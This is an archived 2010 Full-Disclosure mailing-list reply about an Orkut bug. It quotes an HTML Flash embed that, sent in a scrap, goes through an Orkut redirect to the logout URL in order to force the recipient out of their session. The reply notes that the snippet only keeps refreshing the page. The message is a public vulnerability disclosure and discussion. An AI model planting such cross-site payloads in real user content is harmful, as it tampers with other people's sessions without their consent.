lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 12 Jun 2010 14:52:29 -0300
From: "Fabio N Sarmento [ Gmail ]" <fabior2@...il.com>
To: ㅤ ㅤRockey <skg102@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Orkut Signout via scrap

Good find, but it seems it doens't Logout , it's only keep refreshing the
page.

@fabiaum


2010/6/12 ㅤ ㅤRockey <skg102@...il.com>

> Hello,
>
> There is a small bug in orkut scrapbook that if any one sends a scrp
> containing the following code
>
> <div class="para">
> <embed type="application/x-shockwave-flash"
> src="
> promote.orkut.co.in/redirect?u=http://www.orkut.co.in/GLogin?cmd=logout"
> style="" id="979482838" name="979482838" bgcolor="#FFFFFF"
> quality="autohigh" wmode="transparent" allownetworking="internal"
> allowscriptaccess="never" height="1" width="1">
>
> Then the recipient will logout automatically from the orkut.
>
> Same thing occurred to me while I was browsing and mail was sent to me
> from my friend Nikhil and In case same thing occurs with you then you
> should try to delete that scrap on next login and In case you are
> unable to do that then you can simply disable flash then you will be
> able to delete that scrap.
>
> Cheers,
> Rockey Killer
>
>
> --
> It's all about Hacking and Security
>
> http://h4ck3r.in/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ